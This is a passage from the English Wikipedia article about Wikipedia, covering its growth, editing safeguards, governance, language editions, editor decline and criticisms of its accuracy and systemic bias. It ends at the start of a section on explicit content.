Wikipedia gained early contributors from Nupedia, Slashdot postings, and web search engine indexing. Language editions were also created, with a total of 161 by the end of 2004.[33] Nupedia and Wikipedia coexisted until the former's servers were taken down permanently in 2003, and its text was incorporated into Wikipedia. The English Wikipedia passed the mark of two million articles on September 9, 2007, making it the largest encyclopedia ever assembled, surpassing the Yongle Encyclopedia made during the Ming Dynasty in 1408, which had held the record for almost 600 years.[34]

Citing fears of commercial advertising and lack of control, users of the Spanish Wikipediaforked from Wikipedia to create Enciclopedia Libre in February 2002.[35] Wales then announced that Wikipedia would not display advertisements, and changed Wikipedia's domain from wikipedia.com to wikipedia.org.[36][37]

Though the English Wikipedia reached three million articles in August 2009, the growth of the edition, in terms of the numbers of new articles and of editors, appears to have peaked around early 2007.[38] Around 1,800 articles were added daily to the encyclopedia in 2006; by 2013 that average was roughly 800.[39] A team at the Palo Alto Research Center attributed this slowing of growth to the project's increasing exclusivity and resistance to change.[40] Others suggest that the growth is flattening naturally because articles that could be called "low-hanging fruit"—topics that clearly merit an article—have already been created and built up extensively.[41][42][43]

In November 2009, a researcher at the Rey Juan Carlos University in Madrid found that the English Wikipedia had lost 49,000 editors during the first three months of 2009; in comparison, it lost only 4,900 editors during the same period in 2008.[44][45]The Wall Street Journal cited the array of rules applied to editing and disputes related to such content among the reasons for this trend.[46] Wales disputed these claims in 2009, denying the decline and questioning the study's methodology.[47] Two years later, in 2011, he acknowledged a slight decline, noting a decrease from "a little more than 36,000 writers" in June 2010 to 35,800 in June 2011. In the same interview, he also claimed the number of editors was "stable and sustainable".[48] A 2013 MIT Technology Review article, "The Decline of Wikipedia", questioned this claim, revealing that since 2007, Wikipedia had lost a third of its volunteer editors, and that those remaining had focused increasingly on minutiae.[49] In July 2012, The Atlantic reported that the number of administrators was also in decline.[50] In the November 25, 2013, issue of New York magazine, Katherine Ward stated, "Wikipedia, the sixth-most-used website, is facing an internal crisis."[51]

Milestones

Cartogramshowing number of articles in each European language as of January 2019.[update]One square represents 10,000 articles. Languages with fewer than 10,000 articles are represented by one square. Languages are grouped by language family and each language family is presented by a separate color.

In January 2007, Wikipedia first became one of the ten most popular websites in the US, according to comscore Networks. With 42.9 million unique visitors, it was ranked #9, surpassing The New York Times (#10) and Apple (#11). This marked a significant increase over January 2006, when Wikipedia ranked 33rd, with around 18.3 million unique visitors.[52] As of March 2020[update], it ranked 13th[4] in popularity according to Alexa Internet. In 2014, it received eight billion page views every month.[53] On February 9, 2014, The New York Times reported that Wikipedia had 18 billion page views and nearly 500 million unique visitors a month, "according to the ratings firm comScore".[10] Loveland and Reagle argue that, in process, Wikipedia follows a long tradition of historical encyclopedias that have accumulated improvements piecemeal through "stigmergic accumulation".[54][55]

On January 18, 2012, the English Wikipedia participated in a series of coordinated protests against two proposed laws in the United States Congress—the Stop Online Piracy Act (SOPA) and the PROTECT IP Act (PIPA)—by blacking out its pages for 24 hours.[56] More than 162 million people viewed the blackout explanation page that temporarily replaced its content.[57][58]

On January 20, 2014, Subodh Varma reporting for The Economic Times indicated that not only had Wikipedia's growth stalled, it "had lost nearly ten percent of its page views last year. There was a decline of about two billion between December 2012 and December 2013. Its most popular versions are leading the slide: page-views of the English Wikipedia declined by twelve percent, those of German version slid by 17 percent and the Japanese version lost nine percent."[59] Varma added, "While Wikipedia's managers think that this could be due to errors in counting, other experts feel that Google's Knowledge Graphs project launched last year may be gobbling up Wikipedia users."[59] When contacted on this matter, Clay Shirky, associate professor at New York University and fellow at Harvard's Berkman Klein Center for Internet & Society said that he suspected much of the page-view decline was due to Knowledge Graphs, stating, "If you can get your question answered from the search page, you don't need to click [any further]."[59] By the end of December 2016, Wikipedia was ranked the 5th most popular website globally.[60]

In January 2013, 274301 Wikipedia, an asteroid, was named after Wikipedia; in October 2014, Wikipedia was honored with the Wikipedia Monument; and, in July 2015, 106 of the 7,473 700-page volumes of Wikipedia became available as Print Wikipedia. In April 2019, an Israeli lunar lander, Beresheet, crash landed on the surface of the Moon carrying a copy of nearly all of the English Wikipedia engraved on thin nickel plates; experts say the plates likely survived the crash.[61][62] In June 2019, scientists reported that all 16 GB of article text from the English Wikipedia had been encoded into synthetic DNA.[63]

Current state

On January 23, 2020, the English-language Wikipedia, which is the largest language section of the online encyclopedia, published its six millionth article.

By February 2020, Wikipedia ranked eleventh in the world in terms of Internet traffic.[64] As a key resource for disseminating information related to COVID-19, the World Health Organization has partnered with Wikipedia to help combat the spread of misinformation.[65][66]

Wikipedia accepts cryptocurrency donations and Basic Attention Token.[67][68][69]

Openness

Differences between versions of an article are highlighted

Unlike traditional encyclopedias, Wikipedia follows the procrastination principle[note 3] regarding the security of its content.[70]

Restrictions

Due to Wikipedia's increasing popularity, some editions, including the English version, have introduced editing restrictions for certain cases. For instance, on the English Wikipedia and some other language editions, only registered users may create a new article.[71] On the English Wikipedia, among others, particularly controversial, sensitive or vandalism-prone pages have been protected to varying degrees.[72][73] A frequently vandalized article can be "semi-protected" or "extended confirmed protected", meaning that only "autoconfirmed" or "extended confirmed" editors can modify it.[74] A particularly contentious article may be locked so that only administrators can make changes.[75] A 2021 article in the Columbia Journalism Review identified Wikipedia's page-protection policies as "[p]erhaps the most important" means at its disposal to "regulate its market of ideas".[76]

In certain cases, all editors are allowed to submit modifications, but review is required for some editors, depending on certain conditions. For example, the German Wikipedia maintains "stable versions" of articles[77] which have passed certain reviews. Following protracted trials and community discussion, the English Wikipedia introduced the "pending changes" system in December 2012. Under this system, new and unregistered users' edits to certain controversial or vandalism-prone articles are reviewed by established users before they are published.[79]

Wikipedia's editing interface

Review of changes

Although changes are not systematically reviewed, the software that powers Wikipedia provides tools allowing anyone to review changes made by others. Each article's History page links to each revision.[note 4][80] On most articles, anyone can undo others' changes by clicking a link on the article's History page. Anyone can view the latest changes to articles, and anyone registered may maintain a "watchlist" of articles that interest them so they can be notified of changes. "New pages patrol" is a process where newly created articles are checked for obvious problems.[81]

In 2003, economics Ph.D. student Andrea Ciffolilli argued that the low transaction costs of participating in a wiki created a catalyst for collaborative development, and that features such as allowing easy access to past versions of a page favored "creative construction" over "creative destruction".[82]

Vandalism

Main article: Vandalism on Wikipedia

Any change or edit that manipulates content in a way that purposefully compromises Wikipedia's integrity is considered vandalism. The most common and obvious types of vandalism include additions of obscenities and crude humor; it can also include advertising and other types of spam.[83] Sometimes editors commit vandalism by removing content or entirely blanking a given page. Less common types of vandalism, such as the deliberate addition of plausible but false information, can be more difficult to detect. Vandals can introduce irrelevant formatting, modify page semantics such as the page's title or categorization, manipulate the article's underlying code, or use images disruptively.[84]

Obvious vandalism is generally easy to remove from Wikipedia articles; the median time to detect and fix it is a few minutes.[85][86] However, some vandalism takes much longer to detect and repair.[87]

In the Seigenthaler biography incident, an anonymous editor introduced false information into the biography of American political figure John Seigenthaler in May 2005, falsely presenting him as a suspect in the assassination of John F. Kennedy.[87] It remained uncorrected for four months.[87] Seigenthaler, the founding editorial director of USA Today and founder of the Freedom ForumFirst Amendment Center at Vanderbilt University, called Wikipedia co-founder Jimmy Wales and asked whether he had any way of knowing who contributed the misinformation. Wales said he did not, although the perpetrator was eventually traced.[88][89] After the incident, Seigenthaler described Wikipedia as "a flawed and irresponsible research tool".[87] The incident led to policy changes at Wikipedia for tightening up the verifiability of biographical articles of living people.[90]

In 2010, Daniel Tosh encouraged viewers of his show, Tosh.0, to visit the show's Wikipedia article and edit it at will. On a later episode, he commented on the edits to the article, most of them offensive, which had been made by the audience and had prompted the article to be locked from editing.[91][92]

Edit warring

Wikipedians often have disputes regarding content, which may result in repeated competing changes to an article, known as "edit warring".[93][94] It is widely seen as a resource-consuming scenario where no useful knowledge is added,[95] and criticized as creating a competitive[96] and conflict-based[97] editing culture associated with traditional masculine gender roles.[98]

Policies and laws

Content in Wikipedia is subject to the laws (in particular, copyright laws) of the United States and of the US state of Virginia, where the majority of Wikipedia's servers are located. Beyond legal matters, the editorial principles of Wikipedia are embodied in the "five pillars" and in numerous policies and guidelines intended to appropriately shape content. Even these rules are stored in wiki form, and Wikipedia editors write and revise the website's policies and guidelines.[99] Editors can enforce these rules by deleting or modifying non-compliant material. Originally, rules on the non-English editions of Wikipedia were based on a translation of the rules for the English Wikipedia. They have since diverged to some extent.[77]

Content policies and guidelines

According to the rules on the English Wikipedia, each entry in Wikipedia must be about a topic that is encyclopedic and is not a dictionary entry or dictionary-style.[100] A topic should also meet Wikipedia's standards of "notability",[101] which generally means that the topic must have been covered in mainstream media or major academic journal sources that are independent of the article's subject. Further, Wikipedia intends to convey only knowledge that is already established and recognized.[102] It must not present original research. A claim that is likely to be challenged requires a reference to a reliable source. Among Wikipedia editors, this is often phrased as "verifiability, not truth" to express the idea that the readers, not the encyclopedia, are ultimately responsible for checking the truthfulness of the articles and making their own interpretations.[103] This can at times lead to the removal of information that, though valid, is not properly sourced.[104] Finally, Wikipedia must not take sides.[105]

Governance

Further information: Wikipedia:Administration

Wikipedia's initial anarchy integrated democratic and hierarchical elements over time.[106][107] An article is not considered to be owned by its creator or any other editor, nor by the subject of the article.[108]

Administrators

Editors in good standing in the community can request extra user rights, granting them the technical ability to perform certain special actions. In particular, editors can choose to run for "adminship",[109][110] which includes the ability to delete pages or prevent them from being changed in cases of severe vandalism or editorial disputes. Administrators are not supposed to enjoy any special privilege in decision-making; instead, their powers are mostly limited to making edits that have project-wide effects and thus are disallowed to ordinary editors, and to implement restrictions intended to prevent disruptive editors from making unproductive edits.[111][112]

By 2012, fewer editors were becoming administrators compared to Wikipedia's earlier years, in part because the process of vetting potential administrators had become more rigorous.[113]

Dispute resolution

Over time, Wikipedia has developed a semiformal dispute resolution process. To determine community consensus, editors can raise issues at appropriate community forums,[note 5] seek outside input through third opinion requests, or initiate a more general community discussion known as a "request for comment".

Arbitration Committee

Main article: Arbitration Committee

The Arbitration Committee presides over the ultimate dispute resolution process. Although disputes usually arise from a disagreement between two opposing views on how an article should read, the Arbitration Committee explicitly refuses to directly rule on the specific view that should be adopted. Statistical analyses suggest that the committee ignores the content of disputes and rather focuses on the way disputes are conducted,[114] functioning not so much to resolve disputes and make peace between conflicting editors, but to weed out problematic editors while allowing potentially productive editors back in to participate. Therefore, the committee does not dictate the content of articles, although it sometimes condemns content changes when it deems the new content violates Wikipedia policies (for example, if the new content is considered biased). Its remedies include cautions and probations (used in 63% of cases) and banning editors from articles (43%), subject matters (23%), or Wikipedia (16%).[when?] Complete bans from Wikipedia are generally limited to instances of impersonation and anti-social behavior. When conduct is not impersonation or anti-social, but rather anti-consensus or in violation of editing policies, remedies tend to be limited to warnings.[115]

Main article: Wikipedia community

Each article and each user of Wikipedia has an associated "talk" page. These form the primary communication channel for editors to discuss, coordinate and debate.[116]

Wikipedia's community has been described as cultlike,[117] although not always with entirely negative connotations.[118] Its preference for cohesiveness, even if it requires compromise that includes disregard of credentials, has been referred to as "anti-elitism".[119]

Wikipedians sometimes award one another "virtual barnstars" for good work. These personalized tokens of appreciation reveal a wide range of valued work extending far beyond simple editing to include social support, administrative actions, and types of articulation work.[120]

Wikipedia does not require that its editors and contributors provide identification.[121] As Wikipedia grew, "Who writes Wikipedia?" became one of the questions frequently asked there.[122] Jimmy Wales once argued that only "a community ... a dedicated group of a few hundred volunteers" makes the bulk of contributions to Wikipedia and that the project is therefore "much like any traditional organization".[123] In 2008, a Slate magazine article reported that: "According to researchers in Palo Alto, one percent of Wikipedia users are responsible for about half of the site's edits."[124] This method of evaluating contributions was later disputed by Aaron Swartz, who noted that several articles he sampled had large portions of their content (measured by number of characters) contributed by users with low edit counts.[125]

The English Wikipedia has 6,410,280 articles, 42,573,941 registered editors, and 125,342 active editors. An editor is considered active if they have made one or more edits in the past 30 days.

Editors who fail to comply with Wikipedia cultural rituals, such as signing talk page comments, may implicitly signal that they are Wikipedia outsiders, increasing the odds that Wikipedia insiders may target or discount their contributions. Becoming a Wikipedia insider involves non-trivial costs: the contributor is expected to learn Wikipedia-specific technological codes, submit to a sometimes convoluted dispute resolution process, and learn a "baffling culture rich with in-jokes and insider references".[126] Editors who do not log in are in some sense second-class citizens on Wikipedia,[126] as "participants are accredited by members of the wiki community, who have a vested interest in preserving the quality of the work product, on the basis of their ongoing participation",[127] but the contribution histories of anonymous unregistered editors recognized only by their IP addresses cannot be attributed to a particular editor with certainty.

Studies

A 2007 study by researchers from Dartmouth College found that "anonymous and infrequent contributors to Wikipedia ... are as reliable a source of knowledge as those contributors who register with the site".[128] Jimmy Wales stated in 2009 that "[I]t turns out over 50% of all the edits are done by just .7% of the users ... 524 people ... And in fact, the most active 2%, which is 1400 people, have done 73.4% of all the edits."[123] However, Business Insider editor and journalist Henry Blodget showed in 2009 that in a random sample of articles, most Wikipedia content (measured by the amount of contributed text that survives to the latest sampled edit) is created by "outsiders", while most editing and formatting is done by "insiders".[123]

A 2008 study found that Wikipedians were less agreeable, open, and conscientious than others,[129][130] although a later commentary pointed out serious flaws, including that the data showed higher openness and that the differences with the control group and the samples were small.[131] According to a 2009 study, there is "evidence of growing resistance from the Wikipedia community to new content".[132]

Diversity

Several studies have shown that most Wikipedia contributors are male. Notably, the results of a Wikimedia Foundation survey in 2008 showed that only 13 percent of Wikipedia editors were female.[133] Because of this, universities throughout the United States tried to encourage women to become Wikipedia contributors. Similarly, many of these universities, including Yale and Brown, gave college credit to students who create or edit an article relating to women in science or technology.[134]Andrew Lih, a professor and scientist, wrote in The New York Times that the reason he thought the number of male contributors outnumbered the number of females so greatly was because identifying as a woman may expose oneself to "ugly, intimidating behavior".[135] Data has shown that Africans are underrepresented among Wikipedia editors.[136]

Language editions

Main article: List of Wikipedias

Most popular edition of Wikipedia by country in January 2021.
Most viewed editions of Wikipedia over time.
Most edited editions of Wikipedia over time.

There are currently 325 language editions of Wikipedia (also called language versions, or simply Wikipedias). As of November 2021, the six largest, in order of article count, are the English, Cebuano, Swedish, German, French, and Dutch Wikipedias.[138] The second and third-largest Wikipedias owe their position to the article-creating botLsjbot, which as of 2013[update] had created about half the articles on the Swedish Wikipedia, and most of the articles in the Cebuano and Waray Wikipedias. The latter are both languages of the Philippines.

In addition to the top six, twelve other Wikipedias have more than a million articles each (Russian, Spanish, Italian, Polish, Egyptian Arabic, Japanese, Vietnamese, Waray, Chinese, Arabic, Ukrainian and Portuguese), seven more have over 500,000 articles (Persian, Catalan, Serbian, Indonesian, Norwegian, Korean and Finnish), 44 more have over 100,000, and 82 more have over 10,000.[139][138] The largest, the English Wikipedia, has over 6.4 million articles. As of January 2021,[update] the English Wikipedia receives 48% of Wikipedia's cumulative traffic, with the remaining split among the other languages. The top 10 editions represent approximately 85% of the total traffic.[140]

0.1 0.3 1 3

English 6,410,280

Cebuano 6,061,619

Swedish 2,872,837

German 2,633,512

French 2,374,985

Dutch 2,071,672

Russian 1,771,487

Spanish 1,731,929

Italian 1,726,585

Polish 1,496,935

Egyptian Arabic 1,378,106

Japanese 1,301,041

Vietnamese 1,270,100

Waray 1,265,576

Chinese 1,241,658

Arabic 1,143,507

Ukrainian 1,123,328

Portuguese 1,077,410

Persian 846,692

Catalan 689,830

The unit for the numbers in bars is articles.

Since Wikipedia is based on the Web and therefore worldwide, contributors to the same language edition may use different dialects or may come from different countries (as is the case for the English edition). These differences may lead to some conflicts over spelling differences (e.g. colour versus color)[142] or points of view.[143]

Though the various language editions are held to global policies such as "neutral point of view", they diverge on some points of policy and practice, most notably on whether images that are not licensed freely may be used under a claim of fair use.[144][145][146]

Jimmy Wales has described Wikipedia as "an effort to create and distribute a free encyclopedia of the highest possible quality to every single person on the planet in their own language".[147] Though each language edition functions more or less independently, some efforts are made to supervise them all. They are coordinated in part by Meta-Wiki, the Wikimedia Foundation's wiki devoted to maintaining all its projects (Wikipedia and others).[148] For instance, Meta-Wiki provides important statistics on all language editions of Wikipedia,[149] and it maintains a list of articles every Wikipedia should have.[150] The list concerns basic content by subject: biography, history, geography, society, culture, science, technology, and mathematics. It is not rare for articles strongly related to a particular language not to have counterparts in another edition. For example, articles about small towns in the United States might be available only in English, even when they meet the notability criteria of other language Wikipedia projects.

Estimation of contributions shares from different regions in the world to different Wikipedia editions[151]

Translated articles represent only a small portion of articles in most editions, in part because those editions do not allow fully automated translation of articles. Articles available in more than one language may offer "interwiki links", which link to the counterpart articles in other editions.[citation needed]

A study published by PLOS One in 2012 also estimated the share of contributions to different editions of Wikipedia from different regions of the world. It reported that the proportion of the edits made from North America was 51% for the English Wikipedia, and 25% for the simple English Wikipedia.[151]

English Wikipedia editor numbers

Number of editors on the English Wikipedia over time.

On March 1, 2014, The Economist, in an article titled "The Future of Wikipedia", cited a trend analysis concerning data published by the Wikimedia Foundation stating that "[t]he number of editors for the English-language version has fallen by a third in seven years."[152] The attrition rate for active editors in English Wikipedia was cited by The Economist as substantially in contrast to statistics for Wikipedia in other languages (non-English Wikipedia). The Economist reported that the number of contributors with an average of five or more edits per month was relatively constant since 2008 for Wikipedia in other languages at approximately 42,000 editors within narrow seasonal variances of about 2,000 editors up or down. The number of active editors in English Wikipedia, by sharp comparison, was cited as peaking in 2007 at approximately 50,000 and dropping to 30,000 by the start of 2014.

In contrast, the trend analysis published in The Economist presents Wikipedia in other languages (non-English Wikipedia) as successful in retaining their active editors on a renewable and sustained basis, with their numbers remaining relatively constant at approximately 42,000.[152] No comment was made concerning which of the differentiated edit policy standards from Wikipedia in other languages (non-English Wikipedia) would provide a possible alternative to English Wikipedia for effectively ameliorating substantial editor attrition rates on the English-language Wikipedia.[153]

Reception

See also: Academic studies about Wikipedia and Criticism of Wikipedia

Ambox current red Americas.svg

This section needs to be updated. Please help update this article to reflect recent events or newly available information.(March 2018)

Various Wikipedians have criticized Wikipedia's large and growing regulation, which includes more than fifty policies and nearly 150,000 words as of 2014.[update][154][155]

Critics have stated that Wikipedia exhibits systemic bias. In 2010, columnist and journalist Edwin Black described Wikipedia as being a mixture of "truth, half-truth, and some falsehoods".[156] Articles in The Chronicle of Higher Education and The Journal of Academic Librarianship have criticized Wikipedia's "Undue Weight" policy, concluding that the fact that Wikipedia explicitly is not designed to provide correct information about a subject, but rather focus on all the major viewpoints on the subject, give less attention to minor ones, and creates omissions that can lead to false beliefs based on incomplete information.[157][158][159]

Journalists Oliver Kamm and Edwin Black alleged (in 2010 and 2011 respectively) that articles are dominated by the loudest and most persistent voices, usually by a group with an "ax to grind" on the topic.[156][160] A 2008 article in Education Next Journal concluded that as a resource about controversial topics, Wikipedia is subject to manipulation and spin.[161]

In 2020, Omer Benjakob and Stephen Harrison noted that "Media coverage of Wikipedia has radically shifted over the past two decades: once cast as an intellectual frivolity, it is now lauded as the 'last bastion of shared reality' online."[162]

In 2006, the Wikipedia Watch criticism website listed dozens of examples of plagiarism in the English Wikipedia.[163]

Accuracy of content

Main article: Reliability of Wikipedia

Articles for traditional encyclopedias such as Encyclopædia Britannica are written by experts, lending such encyclopedias a reputation for accuracy.[164] However, a peer review in 2005 of forty-two scientific entries on both Wikipedia and Encyclopædia Britannica by the science journal Nature found few differences in accuracy, and concluded that "the average science entry in Wikipedia contained around four inaccuracies; Britannica, about three."[165] Joseph Reagle suggested that while the study reflects "a topical strength of Wikipedia contributors" in science articles, "Wikipedia may not have fared so well using a random sampling of articles or on humanities subjects."[166] Others raised similar critiques.[167] The findings by Nature were disputed by Encyclopædia Britannica,[168][169] and in response, Nature gave a rebuttal of the points raised by Britannica.[170] In addition to the point-for-point disagreement between these two parties, others have examined the sample size and selection method used in the Nature effort, and suggested a "flawed study design" (in Nature's manual selection of articles, in part or in whole, for comparison), absence of statistical analysis (e.g., of reported confidence intervals), and a lack of study "statistical power" (i.e., owing to small sample size, 42 or 4 × 101 articles compared, vs >105 and >106 set sizes for Britannica and the English Wikipedia, respectively).[171]

As a consequence of the open structure, Wikipedia "makes no guarantee of validity" of its content, since no one is ultimately responsible for any claims appearing in it.[172] Concerns have been raised by PC World in 2009 regarding the lack of accountability that results from users' anonymity,[173] the insertion of false information,[174]vandalism, and similar problems.

Economist Tyler Cowen wrote: "If I had to guess whether Wikipedia or the median refereed journal article on economics was more likely to be true after a not so long think I would opt for Wikipedia." He comments that some traditional sources of non-fiction suffer from systemic biases, and novel results, in his opinion, are over-reported in journal articles as well as relevant information being omitted from news reports. However, he also cautions that errors are frequently found on Internet sites and that academics and experts must be vigilant in correcting them.[175]Amy Bruckman has argued that, due to the number of reviewers, "the content of a popular Wikipedia page is actually the most reliable form of information ever created".[176]

Critics argue that Wikipedia's open nature and a lack of proper sources for most of the information makes it unreliable.[177] Some commentators suggest that Wikipedia may be reliable, but that the reliability of any given article is not clear.[178] Editors of traditional reference works such as the Encyclopædia Britannica have questioned the project's utility and status as an encyclopedia.[179] Wikipedia co-founder Jimmy Wales has claimed that Wikipedia has largely avoided the problem of "fake news" because the Wikipedia community regularly debates the quality of sources in articles.[180]

Wikipedia's open structure inherently makes it an easy target for Internet trolls, spammers, and various forms of paid advocacy seen as counterproductive to the maintenance of a neutral and verifiable online encyclopedia.[80][182] In response to paid advocacy editing and undisclosed editing issues, Wikipedia was reported in an article in The Wall Street Journal, to have strengthened its rules and laws against undisclosed editing.[183] The article stated that: "Beginning Monday [from the date of the article, June 16, 2014], changes in Wikipedia's terms of use will require anyone paid to edit articles to disclose that arrangement. Katherine Maher, the nonprofit Wikimedia Foundation's chief communications officer, said the changes address a sentiment among volunteer editors that, 'we're not an advertising service; we're an encyclopedia.'"[183][184][185][186][187] These issues, among others, had been parodied since the first decade of Wikipedia, notably by Stephen Colbert on The Colbert Report.[188]

A Harvard law textbook, Legal Research in a Nutshell (2011), cites Wikipedia as a "general source" that "can be a real boon" in "coming up to speed in the law governing a situation" and, "while not authoritative, can provide basic facts as well as leads to more in-depth resources".[189]

Discouragement in education

Ambox current red Americas.svg

This section needs to be updated. Please help update this article to reflect recent events or newly available information.(December 2020)

Most university lecturers discourage students from citing any encyclopedia in academic work, preferring primary sources;[190] some specifically prohibit Wikipedia citations. Wales stresses that encyclopedias of any type are not usually appropriate to use as citable sources, and should not be relied upon as authoritative.[193] Wales once (2006 or earlier) said he receives about ten emails weekly from students saying they got failing grades on papers because they cited Wikipedia; he told the students they got what they deserved. "For God's sake, you're in college; don't cite the encyclopedia," he said.[194]

In February 2007, an article in The Harvard Crimson newspaper reported that a few of the professors at Harvard University were including Wikipedia articles in their syllabi, although without realizing the articles might change.[195] In June 2007, former president of the American Library AssociationMichael Gorman condemned Wikipedia, along with Google,[196] stating that academics who endorse the use of Wikipedia are "the intellectual equivalent of a dietitian who recommends a steady diet of Big Macs with everything".

In contrast, academic writing[clarification needed] in Wikipedia has evolved in recent years and has been found to increase student interest, personal connection to the product, creativity in material processing, and international collaboration in the learning process.[197]

Medical information

See also: Health information on Wikipedia

On March 5, 2014, Julie Beck writing for The Atlantic magazine in an article titled "Doctors' #1 Source for Healthcare Information: Wikipedia", stated that "Fifty percent of physicians look up conditions on the (Wikipedia) site, and some are editing articles themselves to improve the quality of available information."[198] Beck continued to detail in this article new programs of Amin Azzam at the University of San Francisco to offer medical school courses to medical students for learning to edit and improve Wikipedia articles on health-related issues, as well as internal quality control programs within Wikipedia organized by James Heilman to improve a group of 200 health-related articles of central medical importance up to Wikipedia's highest standard of articles using its Featured Article and Good Article peer-review evaluation process.[198] In a May 7, 2014, follow-up article in The Atlantic titled "Can Wikipedia Ever Be a Definitive Medical Text?", Julie Beck quotes WikiProject Medicine's James Heilman as stating: "Just because a reference is peer-reviewed doesn't mean it's a high-quality reference."[199] Beck added that: "Wikipedia has its own peer review process before articles can be classified as 'good' or 'featured'. Heilman, who has participated in that process before, says 'less than one percent' of Wikipedia's medical articles have passed."[199]

Quality of writing

Screenshot of English Wikipedia's article on Earth, a featured-class article

In a 2006 mention of Jimmy Wales, Time magazine stated that the policy of allowing anyone to edit had made Wikipedia the "biggest (and perhaps best) encyclopedia in the world".[200]

In 2008, researchers at Carnegie Mellon University found that the quality of a Wikipedia article would suffer rather than gain from adding more writers when the article lacked appropriate explicit or implicit coordination.[201] For instance, when contributors rewrite small portions of an entry rather than making full-length revisions, high- and low-quality content may be intermingled within an entry. Roy Rosenzweig, a history professor, stated that American National Biography Online outperformed Wikipedia in terms of its "clear and engaging prose", which, he said, was an important aspect of good historical writing.[202] Contrasting Wikipedia's treatment of Abraham Lincoln to that of Civil War historian James McPherson in American National Biography Online, he said that both were essentially accurate and covered the major episodes in Lincoln's life, but praised "McPherson's richer contextualization ... his artful use of quotations to capture Lincoln's voice ... and ... his ability to convey a profound message in a handful of words." By contrast, he gives an example of Wikipedia's prose that he finds "both verbose and dull". Rosenzweig also criticized the "waffling—encouraged by the NPOV policy—[which] means that it is hard to discern any overall interpretive stance in Wikipedia history". While generally praising the article on William Clarke Quantrill, he quoted its conclusion as an example of such "waffling", which then stated: "Some historians ... remember him as an opportunistic, bloodthirsty outlaw, while others continue to view him as a daring soldier and local folk hero."[202]

Other critics have made similar charges that, even if Wikipedia articles are factually accurate, they are often written in a poor, almost unreadable style. Frequent Wikipedia critic Andrew Orlowski commented, "Even when a Wikipedia entry is 100 percent factually correct, and those facts have been carefully chosen, it all too often reads as if it has been translated from one language to another then into a third, passing an illiterate translator at each stage."[203] A study of Wikipedia articles on cancer was conducted in 2010 by Yaacov Lawrence of the Kimmel Cancer Center at Thomas Jefferson University. The study was limited to those articles that could be found in the Physician Data Query and excluded those written at the "start" class or "stub" class level. Lawrence found the articles accurate but not very readable, and thought that "Wikipedia's lack of readability (to non-college readers) may reflect its varied origins and haphazard editing".[204]The Economist argued that better-written articles tend to be more reliable: "inelegant or ranting prose usually reflects muddled thoughts and incomplete information".[205]

Coverage of topics and systemic bias

See also: Notability in the English Wikipedia and Criticism of Wikipedia § Systemic bias in coverage

Ambox current red Americas.svg

Parts of this article (those related to d:Wikidata:Statistics/Wikipedia) need to be updated. Please help update this article to reflect recent events or newly available information.(March 2017)

Wikipedia seeks to create a summary of all human knowledge in the form of an online encyclopedia, with each topic covered encyclopedically in one article. Since it has terabytes of disk space, it can have far more topics than can be covered by any printed encyclopedia.[206] The exact degree and manner of coverage on Wikipedia is under constant review by its editors, and disagreements are not uncommon (see deletionism and inclusionism).[207][208] Wikipedia contains materials that some people may find objectionable, offensive, or pornographic. The "Wikipedia is not censored" policy has sometimes proved controversial: in 2008, Wikipedia rejected an online petition against the inclusion of images of Muhammad in the English edition of its Muhammad article, citing this policy. The presence of politically, religiously, and pornographically sensitive materials in Wikipedia has led to the censorship of Wikipedia by national authorities in China[209] and Pakistan,[210] amongst other countries.

A 2008 study conducted by researchers at Carnegie Mellon University and Palo Alto Research Center gave a distribution of topics as well as growth (from July 2006 to January 2008) in each field:[211]

  • Culture and Arts: 30% (210%)
  • Biographies and persons: 15% (97%)
  • Geography and places: 14% (52%)
  • Society and social sciences: 12% (83%)
  • History and events: 11% (143%)
  • Natural and Physical Sciences: 9% (213%)
  • Technology and Applied Science: 4% (−6%)
  • Religions and belief systems: 2% (38%)
  • Health: 2% (42%)
  • Mathematics and logic: 1% (146%)
  • Thought and Philosophy: 1% (160%)

These numbers refer only to the number of articles: it is possible for one topic to contain a large number of short articles and another to contain a small number of large ones. Through its "Wikipedia Loves Libraries" program, Wikipedia has partnered with major public libraries such as the New York Public Library for the Performing Arts to expand its coverage of underrepresented subjects and articles.[212]

A 2011 study conducted by researchers at the University of Minnesota indicated that male and female editors focus on different coverage topics. There was a greater concentration of females in the "people and arts" category, while males focus more on "geography and science".[213]

Coverage of topics and selection bias

Research conducted by Mark Graham of the Oxford Internet Institute in 2009 indicated that the geographic distribution of article topics is highly uneven. Africa is the most underrepresented.[214] Across 30 language editions of Wikipedia, historical articles and sections are generally Eurocentric and focused on recent events.[215]

An editorial in The Guardian in 2014 claimed that more effort went into providing references for a list of female porn actors than a list of women writers.[216] Data has also shown that Africa-related material often faces omission; a knowledge gap that a July 2018 Wikimedia conference in Cape Town sought to address.[136]

Systemic biases

When multiple editors contribute to one topic or set of topics, systemic bias may arise, due to the demographic backgrounds of the editors. In 2011, Wales claimed that the unevenness of coverage is a reflection of the demography of the editors, citing for example "biographies of famous women through history and issues surrounding early childcare".[48] The October 22, 2013, essay by Tom Simonite in MIT's Technology Review titled "The Decline of Wikipedia" discussed the effect of systemic bias and policy creep on the downward trend in the number of editors.[49]

Systemic bias on Wikipedia may follow that of culture generally,[vague] for example favoring certain nationalities, ethnicities or majority religions.[217] It may more specifically follow the biases of Internet culture, inclining to be young, male, English-speaking, educated, technologically aware, and wealthy enough to spare time for editing. Biases, intrinsically, may include an overemphasis on topics such as pop culture, technology, and current events.[217]

Taha Yasseri of the University of Oxford, in 2013, studied the statistical trends of systemic bias at Wikipedia introduced by editing conflicts and their resolution.[218][219] His research examined the counterproductive work behavior of edit warring. Yasseri contended that simple reverts or "undo" operations were not the most significant measure of counterproductive behavior at Wikipedia and relied instead on the statistical measurement of detecting "reverting/reverted pairs" or "mutually reverting edit pairs". Such a "mutually reverting edit pair" is defined where one editor reverts the edit of another editor who then, in sequence, returns to revert the first editor in the "mutually reverting edit pairs". The results were tabulated for several language versions of Wikipedia. The English Wikipedia's three largest conflict rates belonged to the articles George W. Bush, anarchism, and Muhammad.[219] By comparison, for the German Wikipedia, the three largest conflict rates at the time of the Oxford study were for the articles covering Croatia, Scientology, and 9/11 conspiracy theories.[219]

Researchers from Washington University developed a statistical model to measure systematic bias in the behavior of Wikipedia's users regarding controversial topics. The authors focused on behavioral changes of the encyclopedia's administrators after assuming the post, writing that systematic bias occurred after the fact.[220][221]

Explicit content

See also: Internet Watch Foundation and Wikipedia and Reporting of child pornography images on Wikimedia Commons

"Wikipedia censorship" redirects here. For the government censorship of Wikipedia, see Censorship of Wikipedia. For Wikipedia's policy concerning censorship, see Wikipedia:Wikipedia is not censored

